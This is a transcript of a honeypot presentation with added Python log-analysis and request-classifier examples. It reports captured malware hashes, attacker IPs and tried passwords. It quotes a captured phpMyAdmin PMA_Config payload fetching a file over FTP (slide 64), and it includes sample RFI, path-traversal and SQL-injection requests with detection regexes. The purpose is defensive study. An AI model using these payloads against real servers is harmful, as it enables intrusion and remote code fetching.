honeypots - november 8th misec presentation

Honeypots

Upload: tazdrumm3r

Post on 11-May-2015


DESCRIPTION

5 additional addendum pages added.

TRANSCRIPT

1. Honeypots

2. Agenda
- About me
- What is a honeypot?
- Different kinds of honeypots
- Honeypots I used
- Different data I discovered

3. About me
- Husband
- Father
- Geek
- Gets distracted by shiny objects easily
- Breaker/Fixer of things

4. This is not a honeypot.

5. Lance Spitzner's definition of honeypots is as follows: "A honeypot is an information system resource whose value lies in unauthorized or illicit use of that resource." (May 2003)

6. (High-interaction honeypots)
Open source: Argos, HIHAT (High Interaction Honeypot Analysis Toolkit), Capture-HPC, Honeywall, Sebek (kernel module), Qebek
Commercial: Windows XP SP0, Windows Vista SP0

7. (Medium interaction) Kippo

8. (Low-interaction honeypots)
Open source: nepenthes, Kojoney, dionaea, Amun, Glastopf, SAFER Honeypot (Spoofing Active Fingerprints w/ Honeyd Enhanced Replies), Google Hack Honeypot, HoneyC, Thug
Commercial: Specter, KFSensor, Honeypoint

9. Clean-net: wife's and sons' laptops. Dirty-net: my desktop ?? Honeybook

10. Medium interaction: Kippo. Low interaction: Amun, Glastopf, Dionaea. Local first, then to the cloud.

11.-15. Ports emulated by Amun, Nepenthes and Dionaea. The original table had one column per honeypot; the column boundaries did not survive extraction, so the emulated services are listed per port across the three:
21: ftpd, ftp
25: imail
42: wins
69: tftp
80: http, asn1
105: mercury
110: axigen, slmail, mdaemon
135: dcom, epmap
139: smb, ms06040, netdde, netbiosname
143: lotusdomino
443: iis, https
445: lsass, pnp, dnsv2, asn1, dcom, ms06070, ms08067, smb
554: helix
587: imail
617: arkeia
1023: sasserftpd
1025: msdtc, dcom
1080: mydoom
1111: tivoli
1433: mssql
1434: mssql
1581: tivoli
1900: arc
2101: msmq
2103: msmq
2105: msmq
2107: msmq
2380: goodtech
2555: upnp
2745: bagle
2954: hpopenview
2967: symantec
2968: symantec
3127: mydoom
3128: mydoom
3140: optix
3268: trend
3306: mysql
3372: msdtc
3628: trend
5000: upnp
5060: sip
5168: trend
5554: sasserftpd
6070: arc
6101: veritas
6129: dameware
7144: peercast
8080: tivoli
9999: maxdb

16. (Amun) A low-interaction honeypot. Emulates a wide range of different vulnerabilities.
The payload transmitted by the attacker is analyzed and any download URL found is extracted. Next, the honeypot tries to download the malicious software and store it on the local hard disc for further analysis.

17. (Glastopf) A web application honeypot. Web server written in Python. Popular attack type emulation already in place: remote file inclusion, local file inclusion, HTML injection via POST requests, SQL injection emulation.

18. (Kippo) Medium interaction SSH honeypot. Designed to log brute force attacks and, most importantly, the entire shell interaction performed by the attacker. Has a fake file system you can read/write to. You can add additional commands.

19. (dionaea) To catch bugs. Meant to be a nepenthes successor. Python embedded; can detect shellcodes; supports IPv6 and TLS. A VoIP module has been developed as part of GSoC 2011.

20. nmap scan of the host with dionaea stopped:

# Nmap 6.01 scan initiated Wed Jul 25 21:46:59 2012 as: nmap -A -oN /root/Desktop/dionaea_off.txt 192.168.1.197
Nmap scan report for lp (192.168.1.197)
Host is up (0.00075s latency).
All 1000 scanned ports on lp (192.168.1.197) are closed
MAC Address: 08:00:27:7C:3B:55 (Cadmus Computer Systems)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.75 ms lp (192.168.1.197)

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
# Nmap done at Wed Jul 25 21:47:01 2012 -- 1 IP address (1 host up) scanned in 2.28 seconds
21. The same scan with dionaea running:

# Nmap 6.01 scan initiated Wed Jul 25 21:47:16 2012 as: nmap -A -oN /root/Desktop/dionaea_on.txt 192.168.1.197
Nmap scan report for lp (192.168.1.197)
Host is up (0.00087s latency).
Not shown: 990 closed ports
PORT     STATE SERVICE      VERSION
21/tcp   open  ftp          Dionaea honeypot ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
42/tcp   open  tcpwrapped
80/tcp   open  http?
|_http-title: Directory listing for /
135/tcp  open  msrpc?
443/tcp  open  ssl/https?
|_http-title: Directory listing for /
| ssl-cert: Subject: commonName=Nepenthes Development Team/organizationName=dionaea.carnivore.it/countryName=DE
| Not valid before: 2012-07-26 01:47:37
|_Not valid after:  2013-07-26 01:47:37
445/tcp  open  microsoft-ds Dionaea honeypot smbd
1433/tcp open  ms-sql-s     Dionaea honeypot MS-SQL server
3306/tcp open  mysql        MySQL 5.0.54
| mysql-info: Protocol: 10
| Version: 5.0.54
| Thread ID: 1729232896
| Some Capabilities: Connect with DB, Compress, Transactions, Secure Connection
| Status: Autocommit
|_Salt: aaaaaaaa
5060/tcp open  sip          (SIP end point; Status: 200 OK)
5061/tcp open  ssl/sip      (SIP end point; Status: 200 OK)
| ssl-cert: Subject: commonName=Nepenthes Development Team/organizationName=dionaea.carnivore.it/countryName=DE
| Not valid before: 2012-07-26 01:47:37
|_Not valid after:  2013-07-26 01:47:37
4 services unrecognized despite returning data.
MAC Address: 08:00:27:7C:3B:55 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:kernel:2.6 cpe:/o:linux:kernel:3
OS details: Linux 2.6.38 - 3.2
Network Distance: 1 hop

Host script results:
|_nbstat: NetBIOS name: LP, NetBIOS user: , NetBIOS MAC:
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
|   Account that was used for smb scripts: guest
|   User-level authentication
|   SMB Security: Challenge/response passwords supported
|_  Message signing disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   NetBIOS computer name: HOMEUSER-

Note what this scan gives away: nmap labels the FTP, SMB and MS-SQL services as "Dionaea honeypot", the TLS certificate carries the default dionaea subject (Nepenthes Development Team / dionaea.carnivore.it), and the MySQL emulation always hands out the salt "aaaaaaaa". Anyone who scans the box can tell it is a honeypot, so change the default certificate and banners before exposing it.
22. Data collected
- 14 pcap files, total of 102 Meg
- 129 replay files, 4 Meg
- 2 log files: Error log, Activity log
- 2 SQLite database files: Logsqlite (the activity log in SQLite format), Sipaccounts
- 1 malicious executable

23. Day 1: 44 unique IP addresses; time it took to get connections: 14 minutes.
Day 2: xx unique IP addresses; time it took to get connections: -; malicious file uploaded.
Never live with the results of one tool, always use multiple tools!!

24. Connections by TCP port and by source address

TCP port | Occurrences | Protocol
23 | 46 | Telnet
22 | 42 | SSH
80 | 40 | HTTP
1080 | 38 | SOCKS Proxy
135 | 34 | DCE Endpoint
573 | 26 | NETRJS
808 | 20 | Net.TCP Port Sharing
25 | 15 | SMTP
993 | 14 | IMAPS
110 | 11 | POP3
139 | 9 | NetBIOS
1 | 8 | TCPMUX
21 | 6 | FTP
79 | 6 | Finger
143 | 5 | IMAP
587 | 5 | SMTP (Email message submission)
995 | 5 | POP3 over TLS/SSL
1096 | 5 | ??
43 | 4 | WHOIS
81 | 4 | Torpark Onion routing

IP address | Occurrences
184.171.169.60 | 69
74.63.195.90 | 19
184.164.150.139 | 13
64.31.14.106 | 5
101.78.154.123 | 4
118.122.188.96 | 3
12.134.192.58 | 3
175.16.97.164 | 3
178.95.22.152 | 3
184.52.56.26 | 3
199.188.104.83 | 3
211.147.3.19 | 3
221.2.209.46 | 3
64.31.29.62 | 3
71.99.147.51 | 3
117.27.137.48 | 2
120.151.204.106 | 2
121.52.71.115 | 2
14.102.115.51 | 2
199.19.94.85 | 2

25. 184.171.169.60 - http://www.securedservers.com/index.php

26. 184.171.169.60 - http://www.securedservers.com/index.php

27. 74.63.195.90 - http://limestonenetworks.com/

28. OS and link fingerprints of connecting hosts

OS | Occurrences
Linux | 14
Windows | 30
Solaris | 1

Link | Occurrences
ethernet/modem | 54
IPv6/IPIP | 3
pppoe (DSL) | 15
sometimes DSL (3) | 4

OS version - Windows | Occurrences
XP/2000 (RFC1323+, w+, tstamp-) | 2
XP SP1+, 2000 SP3 | 3
2000 SP4, XP SP1+ | 22
2000 SP2+, XP SP1+ (seldom 98) | 3

OS version - Linux | Occurrences
2.6 (newer, 1) | 1
2.6 (newer, 2) | 2
2.6 (newer, 3) | 4
2.6, seldom 2.4 (older, 2) | 5
2.6, seldom 2.4 (older, 4) | 2

29. Day 1
Goals:
- Get the honeypot installed and up and running
- Get some traffic
- Run some packet captures
Timeline:
1. 2:55 pm
   1. Started dionaea
   2. I immediately ran an nmap scan and it just lit up like a Christmas tree.
   3. That accounts for 1053 connection attempts.
   4. 6:44 pm - Started Wireshark packet capture
2. 3:07 - the first attacker appears (me)
   1. 6:58 - the first connection appears
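The per-port and per-address occurrence tables above, and the "time it took to get connections" figure, can be produced directly from the Logsqlite file listed on slide 22. The following is an added example, not code from the presentation or from dionaea; it assumes a subset of the column layout dionaea's logsql module writes to its `connections` table and builds an in-memory database from constructed rows so it runs offline. It also drops the operator's own scanning host, since slide 29 notes that the first "attacker" was the author's own nmap run.

```python
import sqlite3
from collections import Counter

# Subset of the columns dionaea's logsql module writes to its "connections"
# table (assumed here; check with `.schema connections` in the sqlite3 shell).
SCHEMA = """
CREATE TABLE connections (
    connection INTEGER PRIMARY KEY,
    connection_type TEXT,
    connection_transport TEXT,
    connection_protocol TEXT,
    connection_timestamp INTEGER,
    local_host TEXT,
    local_port INTEGER,
    remote_host TEXT,
    remote_port INTEGER
);
"""

START = 1343254500  # constructed honeypot start time (epoch seconds)
# Constructed rows: (type, transport, protocol, timestamp, local_port, remote_host).
# The first two come from the operator's own nmap box (constructed address).
SAMPLE_ROWS = [
    ("accept", "tcp", "ftpd",   START + 10,   21,   "192.168.1.50"),
    ("accept", "tcp", "smbd",   START + 11,   445,  "192.168.1.50"),
    ("accept", "tcp", "smbd",   START + 840,  445,  "203.0.113.7"),
    ("accept", "tcp", "mssqld", START + 900,  1433, "203.0.113.7"),
    ("accept", "tcp", "mssqld", START + 960,  1433, "198.51.100.9"),
    ("accept", "tcp", "mysqld", START + 1000, 3306, "198.51.100.9"),
    ("accept", "tcp", "mysqld", START + 1100, 3306, "203.0.113.7"),
    ("accept", "udp", "sipd",   START + 1200, 5060, "192.0.2.44"),
]


def load_sample_db():
    """Build an in-memory logsql-style database from the constructed rows."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    db.executemany(
        "INSERT INTO connections (connection_type, connection_transport, "
        "connection_protocol, connection_timestamp, local_host, local_port, "
        "remote_host, remote_port) VALUES (?, ?, ?, ?, '10.0.0.5', ?, ?, 0)",
        SAMPLE_ROWS,
    )
    return db


def honeypot_stats(db, own_hosts=(), honeypot_start=None):
    """Return (port_counts, host_counts, seconds_to_first_connection).

    Accepted connections from own_hosts (your scanner or admin box) are left
    out so your own nmap run does not inflate the numbers, as on slide 29.
    """
    placeholders = ",".join("?" * len(own_hosts)) or "''"
    rows = db.execute(
        "SELECT local_port, remote_host, connection_timestamp FROM connections "
        "WHERE connection_type = 'accept' "
        f"AND remote_host NOT IN ({placeholders}) ORDER BY connection_timestamp",
        tuple(own_hosts),
    ).fetchall()
    port_counts = Counter(port for port, _, _ in rows)
    host_counts = Counter(host for _, host, _ in rows)
    first = rows[0][2] - honeypot_start if rows and honeypot_start is not None else None
    return port_counts, host_counts, first


if __name__ == "__main__":
    ports, hosts, first = honeypot_stats(load_sample_db(), ("192.168.1.50",), START)
    for port, n in ports.most_common():
        print(f"port {port:<6} {n}")
    for host, n in hosts.most_common():
        print(f"host {host:<16} {n}")
    print(f"first outside connection after {first // 60} minutes")
```

Against a real logsql.sqlite, replace `load_sample_db()` with `sqlite3.connect("/path/to/logsql.sqlite")` and pass the honeypot's start time.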
30. Day 2
Goals:
- Start saving packet captures (with no arp on the capture filter)
- Get some traffic
- Catch some malware?
Timeline:
1. 11:12:04 am
   1. Get a connection from 69.57.27.138
   2. Attempts connection to TCP port 135 (epmap). It gets a SYN, ACK.
2. 11:12:06 am
   1. TFTP session is initiated and malware is being dropped on the system
3. 11:12:42 am
   1. TFTP session completes
4. 14:39:47 am
   1. He's back! (Process from 1.1 starts all over again)

31. MD5 - aff643a5014a9d8e98b24fa4dac11623. VirusTotal 40/42 detection ratio: Rbot.
ThreatExpert: a malicious backdoor trojan that runs in the background and allows remote access to the compromised system; a network-aware worm that attempts to replicate across the existing network(s).

32. IP Address and Domain Information Chrome extension (from TCPIPUtils)
OrgName: Algona Municipal Utilities
OrgId: AMU-6
Address: 104 West Call Street, PO Box 10
City: Algona
StateProv: IA
PostalCode: 50511
Country: US
RegDate: 1/20/2011
Updated: 7/6/2011
http://www.netamu.com/

33. Goals: To the cloud!

34. Round 2: Amazon EC2, Ubuntu 12.04 micro instance in Virginia, Oregon, Sao Paulo (South America), Ireland and Tokyo (Thanks Sukotto_san!). Unable to do Singapore.

35. Files captured: Virginia 3 files; Oregon 0 files; South America 1 file; Tokyo 1 file; Ireland 40 files!!

36. Virginia
- 7a5acd7da5a5d7845a4bcd1a90019e69 - VirusTotal 40/44 - W32/Conficker.worm.gen.a (McAfee)
- 607a710f446de466fcb3be1e5c189c71 - VirusTotal 42/44 - VirScan.org file name: azsvf.nmg
- 344770974dce3c039b48d27bd4e9a114 - VirusTotal 41/42 - W32/Conficker.worm (McAfee); ThreatExpert link: http://www.threatexpert.com/report.aspx?md5=344770974dce3c039b48d27bd4e9a114

37. Virginia: connections by source address and by TCP port

IP address | Occurrences
175.23.26.55 | 11
61.147.103.85 | 7
211.22.54.147 | 3
42.121.84.187 | 2
31.13.232.59 | 2
182.1.23.144 | 2
173.163.222.221 | 1
211.22.54.145 | 1

TCP port | Occurrences | Protocol
1433 | 20 | MSSQL Server
445 | 6 | Microsoft-DS Active Directory, Windows shares
139 | 2 | NetBIOS Session Service
3389 | 1 | Microsoft Terminal Server (RDP)

38. 175.23.26.55, port 1433 - http://www.chinaunicom.com.hk/en/home/default.html
39. 61.147.103.85, port 1433 - http://en.chinatelecom.com.cn/

40. 7a5acd7da5a5d7845a4bcd1a90019e69 - Net-Worm.Win32.Kido.ih

41. 344770974dce3c039b48d27bd4e9a114 - Net-Worm.Win32.Kido.ih - http://www.telkomsel.com

42. 344770974dce3c039b48d27bd4e9a114

43. 607a710f446de466fcb3be1e5c189c71 - http://www.hinet.net/

44. 607a710f446de466fcb3be1e5c189c71

45. South America, 1 file: 0139abdd353ca804aa654c8db556dc46 - VirusTotal 32/41 - Kaspersky: Trojan.Win32.Jorik.IRCbot.qrq

46. 0139abdd353ca804aa654c8db556dc46

47. Tokyo, 2 files
- 933be7b1b0077563f639a99d131bde7f. From: http://esendfile.com/xx81.exe. File name: xx81.exe. Analysis date: 2012-11-02 23:08:50 UTC. VirusTotal 33/44. Kaspersky: Trojan-Dropper.Win32.Injector.fyym; Microsoft: VirTool:Win32/CeeInject.gen!IJ; Sophos: Troj/ProcInj-N
- csrss.exe. From: smb://87.241.82.99 (didn't save)

48. 87.241.82.99

49. Connections by TCP port

TCP port | Occurrences | Protocol
3306 | 909 | MySQL database system
1768 | 81 | ??
1433 | 49 | MSSQL Server
34354 | 38 | ??
3389 | 34 | Microsoft Terminal Server (RDP)
80 | 31 | Hypertext Transfer Protocol (HTTP)
110 | 18 | Post Office Protocol v3 (POP3)
445 | 18 | Microsoft-DS Active Directory, Windows shares
25 | 13 | Simple Mail Transfer Protocol (SMTP)
139 | 11 | NetBIOS Session Service
23 | 9 | Telnet protocol
135 | 6 | Microsoft EPMAP (End Point Mapper), also known as DCE/RPC Locator service, used to remotely manage services including DHCP server, DNS server and WINS. Also used by DCOM

50. Connections by source address

IP address | Occurrences
66.225.253.122 | 273
119.1.96.68 | 192
58.211.69.182 | 179
61.160.200.46 | 99
210.195.52.9 | 81
183.136.144.36 | 78
202.165.179.118 | 38
37.46.112.145 | 31
58.16.63.214 | 30
201.116.201.248 | 28
121.245.220.214 | 24
165.225.128.229 | 18

51. 66.225.253.122, port 3306 - http://www.servercentral.com/

52. 119.1.96.68, port 3306 - http://www.chinanet.com

53. Ireland, 40 files. VirusTotal results from Kaspersky, Microsoft and Sophos. This was from a time frame spanning between
54.-57. VirusTotal results for the 40 Ireland files: a table of file name (MD5), detection ratio, analysis date and the Kaspersky, Microsoft and Sophos detection names (not reproduced here). Nearly every entry is Conficker (Net-Worm.Win32.Kido, Worm:Win32/Conficker.B or .C, Mal/Conficker-A), with a handful of Rbot backdoors and Genome trojans. The last entry has a 0/42 detection ratio because its MD5 is that of an empty file; a zero-byte download should be discarded rather than counted as a sample.

58. Connections by TCP port

TCP port | Occurrences | Protocol
3306 | 205 | MySQL database system
1433 | 173 | MSSQL Server
445 | 154 | Microsoft-DS Active Directory, Windows shares
5060 | 45 | Session Initiation Protocol (SIP)
139 | 38 | NetBIOS Session Service
80 | 32 | Hypertext Transfer Protocol (HTTP)
3389 | 13 | Microsoft Terminal Server (RDP)
1080 | 11 | SOCKS proxy
135 | 6 | DCE endpoint resolution
9097 | 5 | ??
23 | 3 | Telnet protocol
110 | 3 | Post Office Protocol v3 (POP3)
59. Connections by source address, with GeoIP location and notes

IP address | Occurrences | GeoIP location | Interesting notes
61.147.103.137 | 147 | Beijing, China (CN) | TCPIPUtils.com: in 1 of 4 spam databases; 48 different websites near this IP
188.161.92.153 | 44 | Gaza, Palestinian Territory (PS) | TCPIPUtils.com: in 1 of 4 spam databases
42.121.19.84 | 27 | Hangzhou, Zhejiang, China (CN) | TCPIPUtils.com: in 1 of 4 spam databases
203.162.35.88 | 23 | Vietnam (VN) |
125.65.108.65 | 16 | Chengdu, Sichuan, China (CN) | 68 different websites near this IP
181.0.218.144 | 16 | Buenos Aires, Distrito Federal, Argentina (AR) |
65.18.174.167 | 16 | Near Wichita, KS | 26 different websites near this IP, including datemarriedwomen.org
111.249.26.205 | 14 | Taipei, Taiwan (TW) | Same website where the malware from Virginia came from
211.154.213.122 | 12 | Beijing, China (CN) | TCPIPUtils.com: in 1 of 4 spam databases
42.120.0.238 | 12 | Hangzhou, Zhejiang, China (CN) |
187.35.61.105 | 10 | Sao Paulo, Brazil (BR) | TCPIPUtils.com: in 1 of 4 spam databases; 17 different websites near this IP
210.211.117.81 | 10 | Vietnam (VN) |

60.-62. Username/password pairs attempted against the SSH honeypot (several hundred, almost all of the form user/user, e.g. root/password, admin/admin, postgres/postgres; the full list is not reproduced here).

63. Started 10:10 pm November 5th. Total 229 attempts from a single IP. Stopped 4:51 pm November 6th.

64. A phpMyAdmin setup.php request seen by the honeypot; the configuration parameter carries a serialized PMA_Config object whose source is an FTP URL (the credential@host part appears as "[email protected]" on the page):

action=lay_navigation&eoltype=unix&token=&configuration=a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:45:"ftp://hawk1156:[email protected]/ieh.ico";}}

http://ubuntuforums.org/showthread.php?t=2076978
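Slide 17 lists the attack types Glastopf emulates (RFI, LFI, SQL injection), slide 64 shows a serialized PMA_Config payload aimed at phpMyAdmin's setup script, and slide 67 shows the alerts the author raised from such events. The following added example (mine, not Glastopf's code or the presentation's) classifies constructed web-honeypot request lines into those classes and turns them into slide-67-style alerts; it assumes Apache-style request lines and uses the timestamp where the slides use a GeoIP location.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Assumed log shape: Apache-style request lines (constructed samples below).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"')

# One pattern per attack class Glastopf emulates (slide 17), plus the
# serialized PMA_Config payload shape from slide 64.
REMOTE_URL = re.compile(r'^(https?|ftp)://', re.I)
TRAVERSAL = re.compile(r'(\.\./|\.\.\\|/etc/passwd|/proc/self/environ)', re.I)
SQLI = re.compile(r"'.*?(\bor\b|\bunion\b|--|#)|\bunion\s+select\b|\bsleep\(", re.I)
PHP_OBJECT = re.compile(r'O:\d+:"[A-Za-z_]\w*":\d+:\{')


def query_values(query):
    """Split on '&' only: the phpMyAdmin payload uses ';' inside one value,
    which older parse_qsl versions would treat as a separator."""
    values = []
    for pair in query.split("&"):
        if pair:
            values.append(unquote_plus(pair.partition("=")[2]))
    return values


def classify_request(method, target, body=""):
    """Return the attack classes matched by one request ([] if none)."""
    parts = urlsplit(target)
    values = query_values(parts.query) + query_values(body)
    found = []
    if any(REMOTE_URL.match(v) for v in values):
        found.append(f"{method}-based RFI")
    if any(TRAVERSAL.search(v) for v in values) or TRAVERSAL.search(unquote_plus(parts.path)):
        found.append("LFI")
    if any(SQLI.search(v) for v in values):
        found.append("SQL injection")
    if any(PHP_OBJECT.search(v) for v in values):
        found.append("PHP object injection (serialized PMA_Config)")
    return found


def alerts_from_log(lines):
    """Yield (ip, alert) pairs in the style of slide 67 for suspicious requests."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for cls in classify_request(m["method"], m["target"]):
            yield m["ip"], f"{cls} attack from {m['ip']} ({m['ts']})"


# Constructed sample lines; addresses are from documentation ranges.
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Nov/2012:22:10:01 +0000] "GET /index.php?page=http://198.51.100.9/s.txt? HTTP/1.1" 200 512',
    '203.0.113.8 - - [05/Nov/2012:22:10:05 +0000] "GET /view.php?file=../../../../etc/passwd HTTP/1.1" 200 77',
    '203.0.113.9 - - [05/Nov/2012:22:10:09 +0000] "GET /login.php?user=admin%27%20or%201%3D1--&pw=x HTTP/1.1" 200 120',
    '203.0.113.10 - - [05/Nov/2012:22:10:14 +0000] "GET /phpmyadmin/scripts/setup.php?action=lay_navigation'
    '&configuration=a:1:{i:0;O:10:%22PMA_Config%22:1:{s:6:%22source%22;s:23:%22ftp://example.net/c.ico%22;}} HTTP/1.1" 200 0',
    '198.51.100.3 - - [05/Nov/2012:22:11:00 +0000] "GET /robots.txt HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for _ip, alert in alerts_from_log(SAMPLE_LOG):
        print(alert)
```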
65. Websites
- Honeynet Project - http://www.honeynet.org/
- Dionaea - http://dionaea.carnivore.it/
- Honeywall - https://projects.honeynet.org/honeywall/
- Amun: Python Honeypot - http://amunhoney.sourceforge.net/
- Kippo - http://code.google.com/p/kippo/
- Kippo examples: http://blog.macuyiko.com/2011/03/running-ssh-honeypot-with-kippo-lets.html and http://www.austinriba.com/2011/10/fun-and-trickery-with-the-kippo-ssh-honeypot/
- ShadowServer - http://www.shadowserver.org/
- Spiderlabs WASC Distributed Web Honeypots Project - http://blog.spiderlabs.com/2012/02/wasc-distributed-web-honeypots-project-update.html

66. Websites and tools
- Scumware - http://www.scumware.org/index.scumware
- VirusTotal - https://www.virustotal.com/
- TCPIPUtils - http://www.tcpiputils.com/ (Great Chrome extension)
Tools: Wireshark, Network Miner, Netwitness Investigator

67. Example alerts
- A host at $IP ($location) tried to log into my honeypot's fake Terminal Services server
- GET-based RFI attack from $IP ($location)
- A host at $IP ($location) tried to log into my honeypot's fake MSSQL Server
http://inguardians.com/

68. Keith Dixon - @Tazdrumm3r - #misec - [email protected] - tazdrumm3r.wordpress.com

69. http://hakshop.myshopify.com/products/wifi-pineapple - The Hot-Spot Honeypot Pen-Testing Platform

70. http://securityonion.blogspot.com/ - Installing a honeypot? Why not have all the monitoring tools already in place? And there are some bad ass tools on this distro. Considering that Security Onion is Xubuntu based and all of the honeypot installs are based on Lubuntu, I suspect there won't be any issues. I haven't tested this to confirm. If you find out otherwise, email me. I'd love to know what you experience.

71. Mercury Live Honeypot DVD
ftp://ftp.carnivore.it/projects/dionaea/mercury-dvd
http://blog.infosanity.co.uk/2010/09/22/mercury-live-honeypot-dvd/
Mercury Live DVD was initially (I believe) announced in a post to the Nepenthes mailing list. It is a remastered Ubuntu distribution with pre-installed honeypot applications and malware analysis tools created by John Moore.
From the ReadMe: "This live DVD is a remastered version of Ubuntu 10.0 Beta LTS x86_32. It was designed due to my being disappointed with another reverse engineering malware live CD that was released recently. I have decided to call my creation MERCURY, which is an acronym for Malware Enumeration, Capture, and Reverse Engineering. The Mercury live DVD contains tools used for digital forensics, data recovery, network monitoring, and spoofing. It should primarily be used as a honeypot or network monitoring platform as well as a laboratory and teaching aid. There are three honeypots installed: honeyd, nepenthes, and dionaea. Four, if you

72. Scripts, tools and other lessons learned
- Amun: amun_install.sh (location to grab the file; how to set it up)
- Dionaea: install_dionaea.sh (quick and easy setup); install_dionaea_full_monty.sh (previously ran successfully on a Mint 12 install); run_dionaea.sh; run_p0f_dionaea.sh (in case you want to capture OS information)
- Glastopf: setup_glastopf.sh (script untested, but ran through the steps manually successfully)
- Kippo: kippo_install.sh (this is one option on installing and running it; the last line runs it)

73. Scripts, tools and other lessons learned - Lessons learned
- Run only one honeypot at a time.
- When running a honeypot from the cloud, test, test and retest your packet capture script.
- When in doubt, use dumpcap (it's been the most successful for me).
- Adjust the level of logging on dionaea if you're running in the cloud, especially if you're in an extremely active area. Downloading a 4 Gig log file from Ireland was not a quick process.
- First time running dionaea, log everything. Adjust your logging level according to the information you see. If a lot is not useful, dial it back a notch or two.
- Install on an Ubuntu based system. I tried installing on a Debian based load and ran into dependency issues. The keyboard is small and I want to minimize the time at the keyboard. ;) I haven't tried Fedora, OpenSuSE or BSD based systems. If you do, let me know your results. (See slide # 88 for my contact info)
- Take the time to get a good dionaea config file.
- Getting the malware is good. Automatically submitting to